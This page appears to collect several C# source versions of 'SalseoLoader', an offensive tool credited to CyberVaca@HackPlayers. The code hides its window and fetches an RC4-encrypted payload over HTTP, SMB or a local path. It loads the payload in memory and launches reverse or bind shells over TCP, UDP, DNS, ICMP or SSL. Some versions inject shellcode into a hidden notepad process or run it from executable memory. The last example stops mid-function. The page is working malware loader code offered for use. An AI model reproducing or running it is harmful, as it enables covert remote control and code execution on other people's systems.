Beispiel #1
0
        static void Main(string[] args)
        {
            IntPtr h = Process.GetCurrentProcess().MainWindowHandle;

            ShowWindow(h, 0);
            string banner = @"
  _____  ____  _     _____   ___   ___    
 / ___/ /    || |   / ___/  /  _] /   \   
(   \_ |  o  || |  (   \_  /  [_ |     |  
 \__  ||     || |___\__  ||    _]|  O  |  
 /  \ ||  _  ||     /  \ ||   [_ |     |  
 \    ||  |  ||     \    ||     ||     |  
  \___||__|__||_____|\___||_____| \___/   
                                          
 _       ___    ____  ___      ___  ____  
| |     /   \  /    ||   \    /  _]|    \ 
| |    |     ||  o  ||    \  /  [_ |  D  )
| |___ |  O  ||     ||  D  ||    _]|    / 
|     ||     ||  _  ||     ||   [_ |    \ 
|     ||     ||  |  ||     ||     ||  .  \
|_____| \___/ |__|__||_____||_____||__|\_|

";

            Console.ForegroundColor = ConsoleColor.Green;
            Console.Write(banner);
            Console.ForegroundColor = ConsoleColor.White;
            Console.WriteLine("                             By: CyberVaca@HackPlayers");

            if (args.Length <= 3)
            {
                // Ayuda();
                Console.ForegroundColor = ConsoleColor.Gray;
                Console.WriteLine("[+] Usage:\n");
                Console.WriteLine("    [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseTCP LHOST LPORT");
                Console.WriteLine("    [-] SalseoLoader.exe password \\\\smbserver.com\\evil\\elfuckingmal.txt ReverseUDP LHOST LPORT");
                Console.WriteLine("    [-] SalseoLoader.exe password c:\\temp\\elfuckingmal.txt ReverseICMP LHOST");
                Console.WriteLine("    [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseDNS LHOST ServerDNS");
                Console.WriteLine("    [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt BindTCP LHOST LPORT");
                Console.WriteLine("\n[+] Shells availables:\n\n    [-] ReverseTCP\n    [-] ReverseUDP\n    [-] ReverseDNS\n    [-] ReverseICMP\n    [-] BindTCP\n");
                System.Environment.Exit(1);
            }



            //################### Parametros del Loader y comprobacion de los argumentos introducidos ###################
            string Salseo_Encriptado = null;
            string clave             = args[0].ToString();

            byte[] xKey       = Encoding.ASCII.GetBytes(clave);
            string Salseo_URL = args[1].ToString();
            string funcion    = args[2].ToString().ToLower();

            if (funcion == "reversetcp")
            {
                if (args.Length < 5)
                {
                    Console.WriteLine("\n[-] Necesitas introducir un puerto :("); Environment.Exit(1);
                }
            }
            if (funcion == "reverseudp")
            {
                if (args.Length < 5)
                {
                    Console.WriteLine("\n[-] Necesitas introducir un puerto :("); Environment.Exit(1);
                }
            }
            if (funcion == "reversedns")
            {
                if (args.Length < 5)
                {
                    Console.WriteLine("\n[-] Necesitas introducir un nombre de dominio :("); Environment.Exit(1);
                }
            }
            if (funcion == "reverseicmp")
            {
                if (args.Length < 4)
                {
                    Console.WriteLine("\n[-] Necesitas introducir un puerto :("); Environment.Exit(1);
                }
            }
            if (funcion != "reversetcp" & funcion != "reversedns" & funcion != "reverseicmp" & funcion != "reverseudp" & funcion != "bindtcp")
            {
                Console.WriteLine("\n[-] Error en el tipo de shell :("); Environment.Exit(1);
            }
            Console.ForegroundColor = ConsoleColor.Gray;
            if (args[1].ToString().Substring(0, 4).ToLower() == "http")
            {
                Salseo_Encriptado = ClienteWeb.LeePayload(args[1].ToString());
            }
            if (args[1].ToString().Substring(0, 2).ToLower() == "\\\\")
            {
                Console.WriteLine("[+] Leyendo datos via SMB..."); if (System.IO.File.Exists(Salseo_URL) == false)
                {
                    Console.WriteLine("[-] Error: No se pudo leer el payload ¿ La ruta es correcta ?"); Environment.Exit(1);
                }
                Salseo_Encriptado = LeeArchivoSMBorLocal.Archivo(args[1].ToString());
            }
            if (args[1].ToString().Substring(0, 4).ToLower() != "http" && args[1].ToString().Substring(0, 2).ToLower() != "\\\\")
            {
                Console.WriteLine("[+] Leyendo datos via LOCAL..."); if (System.IO.File.Exists(Salseo_URL) == false)
                {
                    Console.WriteLine("[-] Error: No se pudo leer el payload ¿ La ruta es correcta ?"); Environment.Exit(1);
                }
                Salseo_Encriptado = LeeArchivoSMBorLocal.Archivo(args[1].ToString());
            }
            //#############################################################
            //####################### Cargando dll ########################
            //#############################################################

            string hexadecimal = Zipea.Descomprime(Salseo_Encriptado);

            byte[] Final_Payload_encriptado = StringHEXToByteArray.Convierte(hexadecimal);
            byte[] Final_Payload            = RC4.Decrypt(xKey, Final_Payload_encriptado);
            string clases = null;

            Console.WriteLine("[+] Desencriptando el salseo.");
            Assembly salsongo = Assembly.Load(Final_Payload);

            Console.WriteLine("[+] Cargando la salsa en memoria.");
            Console.WriteLine("[+] Namespace de Assembly : " + salsongo.GetName().Name);
            foreach (Type infoass in salsongo.GetTypes())
            {
                var strclase = string.Format("{0}", infoass.Name); clases = strclase;
            }
            ;
            //Console.WriteLine("[+] Class de Assembly : " + clases);
            //######################## Foreach de los metodos ####################
            //#####################################################################
            Console.WriteLine("[+] Version: " + salsongo.GetName().Version.ToString());
            Console.ForegroundColor = ConsoleColor.White;
            //#############################################################

            //########################### LLamada a funcion Reversa ########################
            if (funcion == "reversetcp")
            {
                string     LHOST      = args[3].ToString();
                string     LPORT      = args[4].ToString();
                string[]   argumentos = new string[] { LHOST + " " + LPORT };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("reversetcp");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            if (funcion == "reverseudp")
            {
                string     LHOST      = args[3].ToString();
                string     LPORT      = args[4].ToString();
                string[]   argumentos = new string[] { LHOST + " " + LPORT };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("reverseudp");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            if (funcion == "reversedns")
            {
                string     LHOST      = args[3].ToString();
                string     DNSServer  = args[4].ToString();
                string[]   argumentos = new string[] { LHOST + " " + DNSServer };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("reversedns");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            if (funcion == "reverseicmp")
            {
                string     LHOST      = args[3].ToString();
                string[]   argumentos = new string[] { LHOST + " " };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("reverseicmp");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            if (funcion == "bindtcp")
            {
                string     LHOST      = args[3].ToString();
                string     LPORT      = args[4].ToString();
                string[]   argumentos = new string[] { LHOST + " " + LPORT };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("bindtcp");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
        }
Beispiel #2
0
        static void Main(string[] args)
        {
            IntPtr h = Process.GetCurrentProcess().MainWindowHandle;

            ShowWindow(h, 0);
            string banner = @"
  _____  ____  _     _____   ___   ___    
 / ___/ /    || |   / ___/  /  _] /   \   
(   \_ |  o  || |  (   \_  /  [_ |     |  
 \__  ||     || |___\__  ||    _]|  O  |  
 /  \ ||  _  ||     /  \ ||   [_ |     |  
 \    ||  |  ||     \    ||     ||     |  
  \___||__|__||_____|\___||_____| \___/   
                                          
 _       ___    ____  ___      ___  ____  
| |     /   \  /    ||   \    /  _]|    \ 
| |    |     ||  o  ||    \  /  [_ |  D  )
| |___ |  O  ||     ||  D  ||    _]|    / 
|     ||     ||  _  ||     ||   [_ |    \ 
|     ||     ||  |  ||     ||     ||  .  \
|_____| \___/ |__|__||_____||_____||__|\_|    2.0

";

            Console.ForegroundColor = ConsoleColor.Green;
            Console.Write(banner);
            Console.ForegroundColor = ConsoleColor.White;
            Console.WriteLine("                             By: CyberVaca@HackPlayers");

            if (args.Length <= 2)
            {
                string ayuda = @"
[+] Usage:

    [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseTCP LHOST LPORT
    [-] SalseoLoader.exe password \\smbserver.com\evil\elfuckingmal.txt ReverseUDP LHOST LPORT
    [-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseICMP LHOST
    [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseDNS LHOST ServerDNS
    [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt BindTCP LHOST LPORT
    [-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseSSL LHOST LPORT
    [-] SalseoLoader.exe password http://webserver.com/shellcode.txt shellcode
    [-] SalseoLoader.exe password http://webserver.com/shellcode.txt shellcode PID
    [-] SalseoLoader.exe password http://webserver.com/silent.txt silenttrinity URL_C2C
    
[+] Available Payloads:

    [-] ReverseTCP  [-] ReverseDNS   [-] ReverseSSL  [-] Shellcode
    [-] ReverseUDP  [-] ReverseICMP  [-] BindTCP     [-] SilentTrinity

";
                // Ayuda();
                Console.ForegroundColor = ConsoleColor.Gray;
                Console.WriteLine(ayuda);
                System.Environment.Exit(1);
            }



            //################### Parametros del Loader y comprobacion de los argumentos introducidos ###################
            string Salseo_Encriptado = null;
            string clave             = args[0].ToString();

            byte[] xKey       = Encoding.ASCII.GetBytes(clave);
            string Salseo_URL = args[1].ToString();
            string funcion    = args[2].ToString().ToLower();

            if (funcion == "reversetcp" || funcion == "reversessl")
            {
                if (args.Length < 5)
                {
                    Console.WriteLine("\n[-] Necesitas introducir un puerto :("); Environment.Exit(1);
                }
            }
            if (funcion == "reverseudp")
            {
                if (args.Length < 5)
                {
                    Console.WriteLine("\n[-] Necesitas introducir un puerto :("); Environment.Exit(1);
                }
            }
            if (funcion == "reversedns")
            {
                if (args.Length < 5)
                {
                    Console.WriteLine("\n[-] Necesitas introducir un nombre de dominio :("); Environment.Exit(1);
                }
            }
            if (funcion == "reverseicmp")
            {
                if (args.Length < 4)
                {
                    Environment.Exit(1);
                }
            }
            if (funcion == "shellcode")
            {
                if (args.Length < 2)
                {
                    Environment.Exit(1);
                }
            }
            if (funcion != "reversetcp" & funcion != "reversedns" & funcion != "reverseicmp" & funcion != "reverseudp" & funcion != "bindtcp" & funcion != "reversessl" & funcion != "shellcode" & funcion != "silenttrinity")
            {
                Console.WriteLine("\n[-] Error en el tipo de shell :("); Environment.Exit(1);
            }
            if (funcion == "silenttrinity")
            {
                if (args.Length < 3)
                {
                    Environment.Exit(1);
                }
            }
            Console.ForegroundColor = ConsoleColor.Gray;
            if (args[1].ToString().Substring(0, 4).ToLower() == "http")
            {
                Salseo_Encriptado = ClienteWeb.LeePayload(args[1].ToString());
            }
            if (args[1].ToString().Substring(0, 2).ToLower() == "\\\\")
            {
                Console.WriteLine("[+] Leyendo datos via SMB..."); if (System.IO.File.Exists(Salseo_URL) == false)
                {
                    Console.WriteLine("[-] Error: No se pudo leer el payload ¿ La ruta es correcta ?"); Environment.Exit(1);
                }
                Salseo_Encriptado = LeeArchivoSMBorLocal.Archivo(args[1].ToString());
            }
            if (args[1].ToString().Substring(0, 4).ToLower() != "http" && args[1].ToString().Substring(0, 2).ToLower() != "\\\\")
            {
                Console.WriteLine("[+] Leyendo datos via LOCAL..."); if (System.IO.File.Exists(Salseo_URL) == false)
                {
                    Console.WriteLine("[-] Error: No se pudo leer el payload ¿ La ruta es correcta ?"); Environment.Exit(1);
                }
                Salseo_Encriptado = LeeArchivoSMBorLocal.Archivo(args[1].ToString());
            }
            //#############################################################
            //####################### Cargando dll ########################
            //#############################################################

            string hexadecimal = Zipea.Descomprime(Salseo_Encriptado);

            byte[]   Final_Payload_encriptado = StringHEXToByteArray.Convierte(hexadecimal);
            byte[]   Final_Payload            = RC4.Decrypt(xKey, Final_Payload_encriptado);
            string   clases   = null;
            Assembly salsongo = null;

            if (funcion != "shellcode")
            {
                salsongo = Assembly.Load(Final_Payload);
                Console.WriteLine("[+] Cargando la salsa en memoria.");
                Console.WriteLine("[+] Namespace de Assembly : " + salsongo.GetName().Name);
                foreach (Type infoass in salsongo.GetTypes())
                {
                    var strclase = string.Format("{0}", infoass.Name); clases = strclase;
                }
                ;
                //######################## Foreach de los metodos ####################
                //#####################################################################
                //Console.WriteLine("[+] Version: " + salsongo.GetName().Version.ToString());
                //Console.ForegroundColor = ConsoleColor.White;
                //#############################################################
            }

            //########################### LLamada a funcion SilentTrinity ########################
            if (funcion == "silenttrinity")
            {
                string     URLSILENT  = args[3].ToString();
                string[]   argumentos = new string[] { URLSILENT };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("lanza");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            //########################### LLamada a funcion Reversa ########################
            if (funcion == "reversetcp")
            {
                string     LHOST      = args[3].ToString();
                string     LPORT      = args[4].ToString();
                string[]   argumentos = new string[] { LHOST + " " + LPORT };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("reversetcp");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            if (funcion == "reversessl")
            {
                string     LHOST      = args[3].ToString();
                string     LPORT      = args[4].ToString();
                string[]   argumentos = new string[] { LHOST + " " + LPORT };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("reversessl");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            if (funcion == "reverseudp")
            {
                string     LHOST      = args[3].ToString();
                string     LPORT      = args[4].ToString();
                string[]   argumentos = new string[] { LHOST + " " + LPORT };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("reverseudp");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            if (funcion == "reversedns")
            {
                string     LHOST      = args[3].ToString();
                string     DNSServer  = args[4].ToString();
                string[]   argumentos = new string[] { LHOST + " " + DNSServer };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("reversedns");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            if (funcion == "reverseicmp")
            {
                string     LHOST      = args[3].ToString();
                string[]   argumentos = new string[] { LHOST + " " };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("reverseicmp");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            if (funcion == "bindtcp")
            {
                string     LHOST      = args[3].ToString();
                string     LPORT      = args[4].ToString();
                string[]   argumentos = new string[] { LHOST + " " + LPORT };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("bindtcp");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            if (funcion == "shellcode")
            {
                byte[] sc = Final_Payload;
                if (args.Length == 4)
                {
                    int pid = System.Convert.ToInt32(args[3].ToString());
                    SalsaInjector.CodeInject(pid, sc);
                }
                if (args.Length == 3)
                {
                    Process proc = new Process();
                    Console.WriteLine("[+] Spawneando proceso notepad.exe");
                    proc.StartInfo.FileName    = "C:\\WINDOWS\\SYSTEM32\\NOTEPAD.EXE";
                    proc.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
                    proc.Start();
                    int pid = proc.Id;
                    Console.WriteLine("[+] Proceso con pid " + pid);
                    SalsaInjector.CodeInject(pid, sc);
                }
            }
        }
Beispiel #3
0
        static void Main(string[] args)
        {
            IntPtr h = Process.GetCurrentProcess().MainWindowHandle;

            ShowWindow(h, 0);
            string banner = @"
  _____  ____  _     _____   ___   ___    
 / ___/ /    || |   / ___/  /  _] /   \   
(   \_ |  o  || |  (   \_  /  [_ |     |  
 \__  ||     || |___\__  ||    _]|  O  |  
 /  \ ||  _  ||     /  \ ||   [_ |     |  
 \    ||  |  ||     \    ||     ||     |  
  \___||__|__||_____|\___||_____| \___/   
                                          
 _       ___    ____  ___      ___  ____  
| |     /   \  /    ||   \    /  _]|    \ 
| |    |     ||  o  ||    \  /  [_ |  D  )
| |___ |  O  ||     ||  D  ||    _]|    / 
|     ||     ||  _  ||     ||   [_ |    \ 
|     ||     ||  |  ||     ||     ||  .  \
|_____| \___/ |__|__||_____||_____||__|\_|

";

            Console.ForegroundColor = ConsoleColor.Green;
            Console.Write(banner);
            Console.ForegroundColor = ConsoleColor.White;
            Console.WriteLine("                             By: CyberVaca@HackPlayers");

            if (args.Length <= 2)
            {
                string ayuda = @"
[+] Usage:

    [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseTCP LHOST LPORT
    [-] SalseoLoader.exe password \\smbserver.com\evil\elfuckingmal.txt ReverseUDP LHOST LPORT
    [-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseICMP LHOST
    [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseDNS LHOST ServerDNS
    [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt BindTCP LHOST LPORT
    [-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseSSL LHOST LPORT
    [-] SalseoLoader.exe password http://webserver.com/shellcode.txt shellcode
    [-] SalseoLoader.exe password http://webserver.com/silent.txt silenttrinity URL_C2C
    
[+] Available Payloads:

    [-] ReverseTCP  [-] ReverseDNS   [-] ReverseSSL  [-] Shellcode
    [-] ReverseUDP  [-] ReverseICMP  [-] BindTCP     [-] SilentTrinity

";
                // Ayuda();
                Console.ForegroundColor = ConsoleColor.Gray;
                Console.WriteLine(ayuda);
                System.Environment.Exit(1);
            }



            //################### Parametros del Loader y comprobacion de los argumentos introducidos ###################
            string Salseo_Encriptado = null;
            string clave             = args[0].ToString();

            byte[] xKey       = Encoding.ASCII.GetBytes(clave);
            string Salseo_URL = args[1].ToString();
            string funcion    = args[2].ToString().ToLower();

            if (funcion == "reversetcp" || funcion == "reversessl")
            {
                if (args.Length < 5)
                {
                    Console.WriteLine("\n[-] Necesitas introducir un puerto :("); Environment.Exit(1);
                }
            }
            if (funcion == "reverseudp")
            {
                if (args.Length < 5)
                {
                    Console.WriteLine("\n[-] Necesitas introducir un puerto :("); Environment.Exit(1);
                }
            }
            if (funcion == "reversedns")
            {
                if (args.Length < 5)
                {
                    Console.WriteLine("\n[-] Necesitas introducir un nombre de dominio :("); Environment.Exit(1);
                }
            }
            if (funcion == "reverseicmp")
            {
                if (args.Length < 4)
                {
                    Environment.Exit(1);
                }
            }
            if (funcion == "shellcode")
            {
                if (args.Length < 2)
                {
                    Environment.Exit(1);
                }
            }
            if (funcion != "reversetcp" & funcion != "reversedns" & funcion != "reverseicmp" & funcion != "reverseudp" & funcion != "bindtcp" & funcion != "reversessl" & funcion != "shellcode" & funcion != "silenttrinity")
            {
                Console.WriteLine("\n[-] Error en el tipo de shell :("); Environment.Exit(1);
            }
            if (funcion == "silenttrinity")
            {
                if (args.Length < 3)
                {
                    Environment.Exit(1);
                }
            }
            Console.ForegroundColor = ConsoleColor.Gray;
            if (args[1].ToString().Substring(0, 4).ToLower() == "http")
            {
                Salseo_Encriptado = ClienteWeb.LeePayload(args[1].ToString());
            }
            if (args[1].ToString().Substring(0, 2).ToLower() == "\\\\")
            {
                Console.WriteLine("[+] Leyendo datos via SMB..."); if (System.IO.File.Exists(Salseo_URL) == false)
                {
                    Console.WriteLine("[-] Error: No se pudo leer el payload ¿ La ruta es correcta ?"); Environment.Exit(1);
                }
                Salseo_Encriptado = LeeArchivoSMBorLocal.Archivo(args[1].ToString());
            }
            if (args[1].ToString().Substring(0, 4).ToLower() != "http" && args[1].ToString().Substring(0, 2).ToLower() != "\\\\")
            {
                Console.WriteLine("[+] Leyendo datos via LOCAL..."); if (System.IO.File.Exists(Salseo_URL) == false)
                {
                    Console.WriteLine("[-] Error: No se pudo leer el payload ¿ La ruta es correcta ?"); Environment.Exit(1);
                }
                Salseo_Encriptado = LeeArchivoSMBorLocal.Archivo(args[1].ToString());
            }
            //#############################################################
            //####################### Cargando dll ########################
            //#############################################################

            string hexadecimal = Zipea.Descomprime(Salseo_Encriptado);

            byte[]   Final_Payload_encriptado = StringHEXToByteArray.Convierte(hexadecimal);
            byte[]   Final_Payload            = RC4.Decrypt(xKey, Final_Payload_encriptado);
            string   clases   = null;
            Assembly salsongo = null;

            if (funcion != "shellcode")
            {
                salsongo = Assembly.Load(Final_Payload);
                Console.WriteLine("[+] Cargando la salsa en memoria.");
                Console.WriteLine("[+] Namespace de Assembly : " + salsongo.GetName().Name);
                foreach (Type infoass in salsongo.GetTypes())
                {
                    var strclase = string.Format("{0}", infoass.Name); clases = strclase;
                }
                ;
                //######################## Foreach de los metodos ####################
                //#####################################################################
                //Console.WriteLine("[+] Version: " + salsongo.GetName().Version.ToString());
                //Console.ForegroundColor = ConsoleColor.White;
                //#############################################################
            }

            //########################### LLamada a funcion SilentTrinity ########################
            if (funcion == "silenttrinity")
            {
                string     URLSILENT  = args[3].ToString();
                string[]   argumentos = new string[] { URLSILENT + " " };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("lanza");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            //########################### LLamada a funcion Reversa ########################
            if (funcion == "reversetcp")
            {
                string     LHOST      = args[3].ToString();
                string     LPORT      = args[4].ToString();
                string[]   argumentos = new string[] { LHOST + " " + LPORT };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("reversetcp");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            if (funcion == "reversessl")
            {
                string     LHOST      = args[3].ToString();
                string     LPORT      = args[4].ToString();
                string[]   argumentos = new string[] { LHOST + " " + LPORT };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("reversessl");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            if (funcion == "reverseudp")
            {
                string     LHOST      = args[3].ToString();
                string     LPORT      = args[4].ToString();
                string[]   argumentos = new string[] { LHOST + " " + LPORT };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("reverseudp");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            if (funcion == "reversedns")
            {
                string     LHOST      = args[3].ToString();
                string     DNSServer  = args[4].ToString();
                string[]   argumentos = new string[] { LHOST + " " + DNSServer };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("reversedns");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            if (funcion == "reverseicmp")
            {
                string     LHOST      = args[3].ToString();
                string[]   argumentos = new string[] { LHOST + " " };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("reverseicmp");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            if (funcion == "bindtcp")
            {
                string     LHOST      = args[3].ToString();
                string     LPORT      = args[4].ToString();
                string[]   argumentos = new string[] { LHOST + " " + LPORT };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("bindtcp");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            if (funcion == "shellcode")
            {
                byte[] sc       = Final_Payload;
                IntPtr baseAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)(sc.Length + 1), AllocationType.RESERVE | AllocationType.COMMIT, MemoryProtection.EXECUTE_READWRITE);
                System.Diagnostics.Debug.Assert(baseAddr != IntPtr.Zero, "Error: No se pudo asignar la memoria remota.");
                Console.WriteLine("[+] Intentando cargar Shellcode");

                try
                {
                    Marshal.Copy(sc, 0, baseAddr, sc.Length);
                    ExecuteDelegate del = (ExecuteDelegate)Marshal.GetDelegateForFunctionPointer(baseAddr, typeof(ExecuteDelegate));

                    del();
                }
                catch (Exception e)
                {
                    Console.WriteLine(e.Message);
                }
                finally
                {
                    VirtualFree(baseAddr, 0, FreeType.MEM_RELEASE);
                }
            }
        }
Beispiel #4
0
        static void Main(string[] args)
        {
            IntPtr h = Process.GetCurrentProcess().MainWindowHandle;

            ShowWindow(h, 0);
            string banner = @"
  _____  ____  _     _____   ___   ___    
 / ___/ /    || |   / ___/  /  _] /   \   
(   \_ |  o  || |  (   \_  /  [_ |     |  
 \__  ||     || |___\__  ||    _]|  O  |  
 /  \ ||  _  ||     /  \ ||   [_ |     |  
 \    ||  |  ||     \    ||     ||     |  
  \___||__|__||_____|\___||_____| \___/   
                                          
 _       ___    ____  ___      ___  ____  
| |     /   \  /    ||   \    /  _]|    \ 
| |    |     ||  o  ||    \  /  [_ |  D  )
| |___ |  O  ||     ||  D  ||    _]|    / 
|     ||     ||  _  ||     ||   [_ |    \ 
|     ||     ||  |  ||     ||     ||  .  \
|_____| \___/ |__|__||_____||_____||__|\_|

";

            Console.ForegroundColor = ConsoleColor.Green;
            Console.Write(banner);
            Console.ForegroundColor = ConsoleColor.White;
            Console.WriteLine("                             By: CyberVaca@HackPlayers");

            string ayuda = @"
[+] Usage:

    [-] SalseoStandalone.exe
    [-] You need to have your mandanga.txt on the same folder!
    [-] Serve your payload as you want! SMB, HTTP, Locally...
    [-] Want a meterpreter shell? Create a raw payload with msfvenom,
        encrypt it with encrypterassembly.py and use shellcode function.

    [-] Mandanga.txt contents:
        [-] Reverse TCP/UDP/SSL     [-] Reverse ICMP        [-] Reverse DNS
            <password>                  <password>              <password>
            <path_to_elmal.txt>         <path_to_elmal.txt>     <path_to_elmal.txt>
            reversetcp/udp/ssl          reverseicmp             reversedns
            <LHOST>                     <LHOST>                 <LHOST>
            <LPORT>                                             <DNS Server>

        [-] Bind TCP                [-] SilentTrinity       [-] Shellcode
            <password>                  <password>              <password>
            <path_to_elmal.txt>         <path_to_elmal.txt>     <path_to_payload.txt>
            bindtcp                     silenttrinity           shellcode
            <LHOST>                     <URL_to_C2C>             
            <LPORT> 
   
[+] Available Payloads:

    [-] ReverseTCP  [-] ReverseDNS   [-] ReverseSSL  [-] Shellcode
    [-] ReverseUDP  [-] ReverseICMP  [-] BindTCP     [-] SilentTrinity

";
            //################### Parametros del Loader y comprobacion de los argumentos introducidos ###################

            //////////////////////STANDALONE VERSION
            string file_name  = ".\\mandanga.txt";
            string clave      = "";
            string Salseo_URL = "";
            string funcion    = "";
            string DNSServer  = "";
            string URLSILENT  = "";
            string LHOST      = "";
            string LPORT      = "";

            if (System.IO.File.Exists(file_name) == true)
            {
                System.IO.StreamReader objReader;
                try
                {
                    if (File.ReadLines(file_name).Count() < 3)
                    {
                        Console.WriteLine(ayuda); Environment.Exit(1);
                    }
                    objReader  = new System.IO.StreamReader(file_name);
                    clave      = objReader.ReadLine();           //Pass. ALways present.
                    Salseo_URL = objReader.ReadLine();           //elmal.txt or shellcode.txt. Always present.
                    funcion    = objReader.ReadLine().ToLower(); //Chosen function. Always present.

                    Console.WriteLine("[+] Password: "******"shellcode")
                    {
                        Console.WriteLine("[+] Shellcode path: " + Salseo_URL);
                    }
                    else
                    {
                        Console.WriteLine("[+] Elmal.txt path: " + Salseo_URL);
                    }
                    Console.WriteLine("[+] Chosen Function: " + funcion);
                    if (funcion == "shellcode")
                    {
                    }
                    else if (funcion == "silenttrinity")
                    {
                        if (File.ReadLines(file_name).Count() < 4)
                        {
                            Console.WriteLine(ayuda); Environment.Exit(1);
                        }
                        URLSILENT = objReader.ReadLine(); //SilentTrinity URL.
                        Console.WriteLine("[+] SilentTrinity URL: " + URLSILENT);
                    }
                    else if (funcion == "icmp")
                    {
                        if (File.ReadLines(file_name).Count() < 4)
                        {
                            Console.WriteLine(ayuda); Environment.Exit(1);
                        }
                        LHOST = objReader.ReadLine(); //SilentTrinity URL.
                        Console.WriteLine("[+] SilentTrinity URL: " + LHOST);
                    }
                    else if (funcion == "serverdns")
                    {
                        //HOST + DNSserver for dns shells.
                        if (File.ReadLines(file_name).Count() < 5)
                        {
                            Console.WriteLine(ayuda); Environment.Exit(1);
                        }
                        LHOST     = objReader.ReadLine();
                        DNSServer = objReader.ReadLine();
                        Console.WriteLine("IP: " + LHOST);
                        Console.WriteLine("Port: " + DNSServer);
                    }
                    else
                    {
                        //HOST + PORT for bind/reverse shells.
                        if (File.ReadLines(file_name).Count() < 5)
                        {
                            Console.WriteLine(ayuda); Environment.Exit(1);
                        }
                        LHOST = objReader.ReadLine();
                        LPORT = objReader.ReadLine();
                        Console.WriteLine("IP: " + LHOST);
                        Console.WriteLine("Port: " + LPORT);
                    }
                    objReader.Close();
                }
                catch (System.NullReferenceException e)
                {
                    Console.WriteLine(e);
                }
            }
            else
            {
                Console.WriteLine(ayuda); Console.WriteLine("[-] .\\mandanga.txt file does not exist."); Environment.Exit(1);
            }



            string Salseo_Encriptado = null;

            byte[] xKey = Encoding.ASCII.GetBytes(clave);
            Console.ForegroundColor = ConsoleColor.Gray;
            if (Salseo_URL.Substring(0, 4).ToLower() == "http")
            {
                Salseo_Encriptado = ClienteWeb.LeePayload(Salseo_URL);
            }
            if (Salseo_URL.Substring(0, 2).ToLower() == "\\\\")
            {
                Console.WriteLine("[+] Leyendo datos via SMB..."); if (System.IO.File.Exists(Salseo_URL) == false)
                {
                    Console.WriteLine("[-] Error: No se pudo leer el payload ¿ La ruta es correcta ?"); Environment.Exit(1);
                }
                Salseo_Encriptado = LeeArchivoSMBorLocal.Archivo(Salseo_URL);
            }
            if (Salseo_URL.Substring(0, 4).ToLower() != "http" && Salseo_URL.Substring(0, 2).ToLower() != "\\\\")
            {
